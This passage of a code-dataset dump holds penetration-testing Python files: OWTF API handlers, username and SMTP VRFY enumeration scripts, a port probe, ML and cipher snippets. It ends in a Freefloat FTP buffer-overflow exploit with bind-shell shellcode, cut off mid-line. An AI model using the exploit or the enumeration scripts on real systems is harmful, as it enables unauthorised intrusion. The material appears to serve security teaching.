\"https://www.owasp.org/index.php/Testing_for_Brute_Force_(OWASP-AT-004)\",\n \"descrip\": \"Testing for Brute Force\"\n }\n },\n }\n }\n \"\"\"\n try:\n filter_data = dict(self.request.arguments)\n results = get_all_poutputs(self.session, filter_data, target_id=int(target_id), inc_output=False)\n\n # Get test groups as well, for names and info links\n groups = {}\n for group in TestGroup.get_all(self.session):\n group[\"mappings\"] = MAPPINGS.get(group[\"code\"], {})\n groups[group[\"code\"]] = group\n\n dict_to_return = {}\n for item in results:\n if item[\"plugin_code\"] in dict_to_return:\n dict_to_return[item[\"plugin_code\"]][\"data\"].append(item)\n else:\n ini_list = []\n ini_list.append(item)\n dict_to_return[item[\"plugin_code\"]] = {}\n dict_to_return[item[\"plugin_code\"]][\"data\"] = ini_list\n dict_to_return[item[\"plugin_code\"]][\"details\"] = groups[item[\"plugin_code\"]]\n dict_to_return = collections.OrderedDict(sorted(dict_to_return.items()))\n if results:\n self.success(dict_to_return)\n else:\n raise APIError(500, \"Cannot fetch plugin outputs\")\n\n except exceptions.InvalidTargetReference:\n raise APIError(400, \"Invalid target provided\")\n except exceptions.InvalidParameterType:\n raise APIError(400, \"Invalid parameter type provided\")\n\n\n@jwtauth\nclass PluginOutputHandler(APIRequestHandler):\n \"\"\"Filter plugin output data.\"\"\"\n\n SUPPORTED_METHODS = [\"GET\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\"]\n\n def get(self, target_id=None, plugin_group=None, plugin_type=None, plugin_code=None):\n \"\"\"Get the plugin output based on query filter params.\n\n **Example request**:\n\n .. sourcecode:: http\n\n GET /api/v1/targets/2/poutput/?plugin_code=OWTF-AJ-001 HTTP/1.1\n X-Requested-With: XMLHttpRequest\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n\n {\n \"status\": \"success\",\n \"data\": [\n {\n \"status\": \"Successful\",\n \"owtf_rank\": -1,\n \"plugin_group\": \"web\",\n \"start_time\": \"01/04/2018-14:06\",\n \"target_id\": 2,\n \"run_time\": \"0s, 1ms\",\n \"user_rank\": -1,\n \"plugin_key\": \"external@OWTF-AJ-001\",\n \"id\": 27,\n \"plugin_code\": \"OWTF-AJ-001\",\n \"user_notes\": null,\n \"output_path\": null,\n \"end_time\": \"01/04/2018-14:06\",\n \"error\": null,\n \"output\": \"Intended to show helpful info in the future\",\n \"plugin_type\": \"external\"\n }\n ]\n }\n \"\"\"\n try:\n filter_data = dict(self.request.arguments)\n if plugin_group and (not plugin_type):\n filter_data.update({\"plugin_group\": plugin_group})\n if plugin_type and plugin_group and (not plugin_code):\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in selected plugin group\")\n filter_data.update({\"plugin_type\": plugin_type, \"plugin_group\": plugin_group})\n if plugin_type and plugin_group and plugin_code:\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in selected plugin group\")\n filter_data.update(\n {\"plugin_type\": plugin_type, \"plugin_group\": plugin_group, \"plugin_code\": plugin_code}\n )\n results = get_all_poutputs(self.session, filter_data, target_id=int(target_id), inc_output=True)\n if results:\n self.success(results)\n else:\n raise APIError(500, \"Cannot fetch plugin outputs\")\n\n except exceptions.InvalidTargetReference:\n raise APIError(400, \"Invalid target reference provided\")\n except exceptions.InvalidParameterType:\n raise APIError(400, \"Invalid parameter type provided\")\n\n def post(self, target_url):\n raise APIError(405)\n\n def put(self):\n raise APIError(405)\n\n def patch(self, target_id=None, plugin_group=None, plugin_type=None, plugin_code=None):\n \"\"\"Modify plugin output data like ranking, severity, notes, etc.\n\n **Example request**:\n\n .. sourcecode:: http\n\n PATCH /api/v1/targets/2/poutput/web/external/OWTF-CM-008 HTTP/1.1\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n\n\n user_rank=0\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Length: 0\n Content-Type: application/json\n\n {\n \"status\": \"success\",\n \"data\": null\n }\n \"\"\"\n try:\n if (not target_id) or (not plugin_group) or (not plugin_type) or (not plugin_code):\n raise APIError(400, \"Missing requirement arguments\")\n else:\n patch_data = dict(self.request.arguments)\n update_poutput(self.session, plugin_group, plugin_type, plugin_code, patch_data, target_id=target_id)\n self.success(None)\n except exceptions.InvalidTargetReference:\n raise APIError(400, \"Invalid target reference provided\")\n except exceptions.InvalidParameterType:\n raise APIError(400, \"Invalid parameter type provided\")\n\n def delete(self, target_id=None, plugin_group=None, plugin_type=None, plugin_code=None):\n \"\"\"Delete a plugin output.\n\n **Example request**:\n\n .. sourcecode:: http\n\n DELETE /api/v1/targets/2/poutput/web/external/OWTF-AJ-001 HTTP/1.1\n X-Requested-With: XMLHttpRequest\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n {\n \"status\": \"success\",\n \"data\": null\n }\n \"\"\"\n try:\n filter_data = dict(self.request.arguments)\n if not plugin_group: # First check if plugin_group is present in url\n delete_all_poutput(self.session, filter_data, target_id=int(target_id))\n if plugin_group and (not plugin_type):\n filter_data.update({\"plugin_group\": plugin_group})\n delete_all_poutput(self.session, filter_data, target_id=int(target_id))\n if plugin_type and plugin_group and (not plugin_code):\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in the selected plugin group\")\n filter_data.update({\"plugin_type\": plugin_type, \"plugin_group\": plugin_group})\n delete_all_poutput(self.session, filter_data, target_id=int(target_id))\n if plugin_type and plugin_group and plugin_code:\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in the selected plugin group\")\n filter_data.update(\n {\"plugin_type\": plugin_type, \"plugin_group\": plugin_group, \"plugin_code\": plugin_code}\n )\n delete_all_poutput(self.session, filter_data, target_id=int(target_id))\n self.success(None)\n except exceptions.InvalidTargetReference:\n raise APIError(400, \"Invalid target reference provided\")\n except exceptions.InvalidParameterType:\n raise APIError(400, \"Invalid parameter type provided\")\n"},"avg_line_length":{"kind":"number","value":40.126315789473686,"string":"40.126316"},"max_line_length":{"kind":"number","value":117,"string":"117"},"alphnanum_fraction":{"kind":"number","value":0.4919050361553721,"string":"0.491905"}}},{"rowIdx":161,"cells":{"repo_name":{"kind":"string","value":"Python-Penetration-Testing-for-Developers"},"text":{"kind":"string","value":"#basic username check\nimport sys\nimport urllib\nimport urllib2\n\nif len(sys.argv) !=2:\n print \"usage: %s username\" % (sys.argv[0])\n sys.exit(0)\n\nurl = \"http://www.vulnerablesite.com/forgotpassword.html\"\nusername = str(sys.argv[1])\ndata = urllib.urlencode({\"username\":username})\nresponse = urllib2.urlopen(url,data).read()\nUnknownStr=\"Username not found\"\nif(response.find(UnknownStr)<0):\n\tprint \"Username exists!\"\n"},"avg_line_length":{"kind":"number","value":23.58823529411765,"string":"23.588235"},"max_line_length":{"kind":"number","value":57,"string":"57"},"alphnanum_fraction":{"kind":"number","value":0.7242206235011991,"string":"0.724221"}}},{"rowIdx":162,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"import screenshot\r\nimport requests\r\n\r\nportList = [80,443,2082,2083,2086,2087,2095,2096,8080,8880,8443,9998,4643,9001,4489]\r\n\r\nIP = '127.0.0.1'\r\n\r\nhttp = 'http://'\r\nhttps = 'https://'\r\n\r\ndef testAndSave(protocol, portNumber):\r\n url = protocol + IP + ':' + str(portNumber)\r\n try:\r\n r = requests.get(url,timeout=1)\r\n \r\n if r.status_code == 200:\r\n print 'Found site on ' + url \r\n s = screenshot.Screenshot()\r\n image = s.get_image(url)\r\n image.save(str(portNumber) + '.png')\r\n except:\r\n pass\r\n\r\nfor port in portList:\r\n testAndSave(http, port)\r\n testAndSave(https, port)\r\n"},"avg_line_length":{"kind":"number","value":23.22222222222222,"string":"23.222222"},"max_line_length":{"kind":"number","value":85,"string":"85"},"alphnanum_fraction":{"kind":"number","value":0.5650842266462481,"string":"0.565084"}}},{"rowIdx":163,"cells":{"repo_name":{"kind":"string","value":"PenetrationTestingScripts"},"text":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-09 05:40\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('nmaper', '0011_auto_20160108_0702'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='nmapscan',\n name='slug',\n ),\n migrations.AddField(\n model_name='nmapscan',\n name='uuid',\n field=models.CharField(default='', max_length=128),\n preserve_default=False,\n ),\n ]\n"},"avg_line_length":{"kind":"number","value":22.076923076923077,"string":"22.076923"},"max_line_length":{"kind":"number","value":63,"string":"63"},"alphnanum_fraction":{"kind":"number","value":0.5642737896494157,"string":"0.564274"}}},{"rowIdx":164,"cells":{"repo_name":{"kind":"string","value":"Mastering-Machine-Learning-for-Penetration-Testing"},"text":{"kind":"string","value":"import numpy\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend\nbackend.set_image_dim_ordering('th')\nmodel = Sequential()\nmodel.add(Conv2D(32, (5, 5), input_shape=(1, 28, 28),\nactivation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam',metrics=['accuracy'])\n"},"avg_line_length":{"kind":"number","value":34,"string":"34"},"max_line_length":{"kind":"number","value":85,"string":"85"},"alphnanum_fraction":{"kind":"number","value":0.784741144414169,"string":"0.784741"}}},{"rowIdx":165,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"from owtf.managers.resource import get_resources\nfrom owtf.plugin.helper import plugin_helper\n\nDESCRIPTION = \"Plugin to assist manual testing\"\n\n\ndef run(PluginInfo):\n resource = get_resources(\"ExternalFileExtHandling\")\n Content = plugin_helper.resource_linklist(\"Online Resources\", resource)\n return Content\n"},"avg_line_length":{"kind":"number","value":27.90909090909091,"string":"27.909091"},"max_line_length":{"kind":"number","value":75,"string":"75"},"alphnanum_fraction":{"kind":"number","value":0.7823343848580442,"string":"0.782334"}}},{"rowIdx":166,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"from owtf.managers.resource import get_resources\nfrom owtf.plugin.helper import plugin_helper\n\nDESCRIPTION = \"Cross Site Flashing Plugin to assist manual testing\"\n\n\ndef run(PluginInfo):\n resource = get_resources(\"ExternalCrossSiteFlashing\")\n Content = plugin_helper.resource_linklist(\"Online Resources\", resource)\n return Content\n"},"avg_line_length":{"kind":"number","value":29.90909090909091,"string":"29.909091"},"max_line_length":{"kind":"number","value":75,"string":"75"},"alphnanum_fraction":{"kind":"number","value":0.7876106194690266,"string":"0.787611"}}},{"rowIdx":167,"cells":{"repo_name":{"kind":"string","value":"Python-Penetration-Testing-for-Developers"},"text":{"kind":"string","value":"import sys\n\nf = open(\"ciphers.txt\", \"r\")\n\nMSGS = f.readlines()\n\ndef strxor(a, b): # xor two strings of different lengths\n if len(a) > len(b):\n return \"\".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a[:len(b)], b)])\n else:\n return \"\".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a, b[:len(a)])])\n\ndef encrypt(key, msg):\n c = strxor(key, msg)\n return c\n\nkey = \"315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764\".decode(\"hex\")\nk3y = \"32510ba9babebbbefd001547a810e67149caee11d945cd7fc81a05e9f85aac650e9052ba6a8cd8257bf14d13e6f0a803b54fde9e77472dbff89d71b57bddef121336cb85ccb8f3315f4b52e301d16e9f52f904\".decode(\"hex\")\nmsg = \"We can factor the number 15 with quantum computers. We can also factor the number 15 with a dog trained to bark three times\"\nciphertexts = encrypt(msg, key)\nanswer = encrypt(ciphertexts, k3y)\nprint answer\nprint answer.encode(\"hex\")"},"avg_line_length":{"kind":"number","value":45.91304347826087,"string":"45.913043"},"max_line_length":{"kind":"number","value":268,"string":"268"},"alphnanum_fraction":{"kind":"number","value":0.7653061224489796,"string":"0.765306"}}},{"rowIdx":168,"cells":{"repo_name":{"kind":"string","value":"Penetration-Testing-Study-Notes"},"text":{"kind":"string","value":"#!/usr/bin/python\nimport socket\nimport sys\nimport subprocess\n\nif len(sys.argv) != 2:\n print \"Usage: smtprecon.py \"\n sys.exit(0)\n\n#SMTPSCAN = \"nmap -vv -sV -Pn -p 25,465,587 --script=smtp-vuln* %s\" % (sys.argv[1])\n#results = subprocess.check_output(SMTPSCAN, shell=True)\n\n#f = open(\"results/smtpnmapresults.txt\", \"a\")\n#f.write(results)\n#f.close\n\n\nprint \"INFO: Trying SMTP Enum on \" + sys.argv[1]\nnames = open('/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/namelist.txt', 'r')\nfor name in names:\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connect=s.connect((sys.argv[1],25))\n banner=s.recv(1024)\n s.send('HELO test@test.org \\r\\n')\n result= s.recv(1024)\n s.send('VRFY ' + name.strip() + '\\r\\n')\n result=s.recv(1024)\n if (\"not implemented\" in result) or (\"disallowed\" in result):\n\tsys.exit(\"INFO: VRFY Command not implemented on \" + sys.argv[1]) \n if ((\"250\" in result) or (\"252\" in result) and (\"Cannot VRFY\" not in result)):\n\tprint \"[*] SMTP VRFY Account found on \" + sys.argv[1] + \": \" + name.strip()\t\n s.close()\n\n"},"avg_line_length":{"kind":"number","value":31,"string":"31"},"max_line_length":{"kind":"number","value":94,"string":"94"},"alphnanum_fraction":{"kind":"number","value":0.6504139834406624,"string":"0.650414"}}},{"rowIdx":169,"cells":{"repo_name":{"kind":"string","value":"Python-Penetration-Testing-for-Developers"},"text":{"kind":"string","value":"import socket\nhost = \"192.168.0.1\"\nport = 12346\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind((host,port))\ns.settimeout(5)\ndata, addr = s.recvfrom(1024)\nprint \"recevied from \",addr\nprint \"obtained \", data\ns.close()"},"avg_line_length":{"kind":"number","value":21.9,"string":"21.9"},"max_line_length":{"kind":"number","value":52,"string":"52"},"alphnanum_fraction":{"kind":"number","value":0.7149122807017544,"string":"0.714912"}}},{"rowIdx":170,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"#!/usr/bin/Python\n#Title: Freefloat FTP 1.0 Non Implemented Command Buffer Overflows\n#Author: Craig Freyman (@cd1zz)\n#Date: July 19, 2011\n#Tested on Windows XP SP3 English\n#Part of FreeFloat pwn week\n#Vendor Notified: 7-18-2011 (no response)\n#Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php\n\nimport socket,sys,time,struct\n\nif len(sys.argv) < 2:\n print \"[-]Usage: %s \" % sys.argv[0] + \"\\r\"\n print \"[-]For example [filename.py 192.168.1.10 PWND] would do the trick.\"\n print \"[-]Other options: AUTH, APPE, ALLO, ACCT\"\n sys.exit(0)\n\ntarget = sys.argv[1]\ncommand = sys.argv[2]\n\nif len(sys.argv) > 2:\n platform = sys.argv[2]\n\n#./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b \"\\x00\\xff\\x0d\\x0a\\x3d\\x20\"\n#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)\n\nshellcode = (\"\\xbf\\x5c\\x2a\\x11\\xb3\\xd9\\xe5\\xd9\\x74\\x24\\xf4\\x5d\\x33\\xc9\" \n\"\\xb1\\x56\\x83\\xc5\\x04\\x31\\x7d\\x0f\\x03\\x7d\\x53\\xc8\\xe4\\x4f\" \n\"\\x83\\x85\\x07\\xb0\\x53\\xf6\\x8e\\x55\\x62\\x24\\xf4\\x1e\\xd6\\xf8\" \n\"\\x7e\\x72\\xda\\x73\\xd2\\x67\\x69\\xf1\\xfb\\x88\\xda\\xbc\\xdd\\xa7\" \n\"\\xdb\\x70\\xe2\\x64\\x1f\\x12\\x9e\\x76\\x73\\xf4\\x9f\\xb8\\x86\\xf5\" \n\"\\xd8\\xa5\\x68\\xa7\\xb1\\xa2\\xda\\x58\\xb5\\xf7\\xe6\\x59\\x19\\x7c\" \n\"\\x56\\x22\\x1c\\x43\\x22\\x98\\x1f\\x94\\x9a\\x97\\x68\\x0c\\x91\\xf0\" \n\"\\x48\\x2d\\x76\\xe3\\xb5\\x64\\xf3\\xd0\\x4e\\x77\\xd5\\x28\\xae\\x49\" \n\"\\x19\\xe6\\x91\\x65\\x94\\xf6\\xd6\\x42\\x46\\x8d\\x2c\\xb1\\xfb\\x96\" \n\"\\xf6\\xcb\\x27\\x12\\xeb\\x6c\\xac\\x84\\xcf\\x8d\\x61\\x52\\x9b\\x82\" \n\"\\xce\\x10\\xc3\\x86\\xd1\\xf5\\x7f\\xb2\\x5a\\xf8\\xaf\\x32\\x18\\xdf\" \n\"\\x6b\\x1e\\xfb\\x7e\\x2d\\xfa\\xaa\\x7f\\x2d\\xa2\\x13\\xda\\x25\\x41\" \n\"\\x40\\x5c\\x64\\x0e\\xa5\\x53\\x97\\xce\\xa1\\xe4\\xe4\\xfc\\x6e\\x5f\" \n\"\\x63\\x4d\\xe7\\x79\\x74\\xb2\\xd2\\x3e\\xea\\x4d\\xdc\\x3e\\x22\\x8a\" \n\"\\x88\\x6e\\x5c\\x3b\\xb0\\xe4\\x9c\\xc4\\x65\\xaa\\xcc\\x6a\\xd5\\x0b\" \n\"\\xbd\\xca\\x85\\xe3\\xd7\\xc4\\xfa\\x14\\xd8\\x0e\\x8d\\x12\\x16\\x6a\" \n\"\\xde\\xf4\\x5b\\x8c\\xf1\\x58\\xd5\\x6a\\x9b\\x70\\xb3\\x25\\x33\\xb3\" \n\"\\xe0\\xfd\\xa4\\xcc\\xc2\\x51\\x7d\\x5b\\x5a\\xbc\\xb9\\x64\\x5b\\xea\" \n\"\\xea\\xc9\\xf3\\x7d\\x78\\x02\\xc0\\x9c\\x7f\\x0f\\x60\\xd6\\xb8\\xd8\" \n\"\\xfa\\x86\\x0b\\x78\\xfa\\x82\\xfb\\x19\\x69\\x49\\xfb\\x54\\x92\\xc6\" \n\"\\xac\\x31\\x64\\x1f\\x38\\xac\\xdf\\x89\\x5e\\x2d\\xb9\\xf2\\xda\\xea\" \n\"\\x7a\\xfc\\xe3\\x7f\\xc6\\xda\\xf3\\xb9\\xc7\\x66\\xa7\\x15\\x9e\\x30\" \n\"\\x11\\xd0\\x48\\xf3\\xcb\\x8a\\x27\\x5d\\x9b\\x4b\\x04\\x5e\\xdd\\x53\" \n\"\\x41\\x28\\x01\\xe5\\x3c\\x6d\\x3e\\xca\\xa8\\x79\\x47\\x36\\x49\\x85\" \n\"\\x92\\xf2\\x79\\xcc\\xbe\\x53\\x12\\x89\\x2b\\xe6\\x7f\\x2a\\x86\\x25\" \n\"\\x86\\xa9\\x22\\xd6\\x7d\\xb1\\x47\\xd3\\x3a\\x75\\xb4\\xa9\\x53\\x10\" \n\"\\xba\\x1e\\x53\\x31\")\n\n#7C874413 FFE4 JMP ESP kernel32.dll\nret = struct.pack('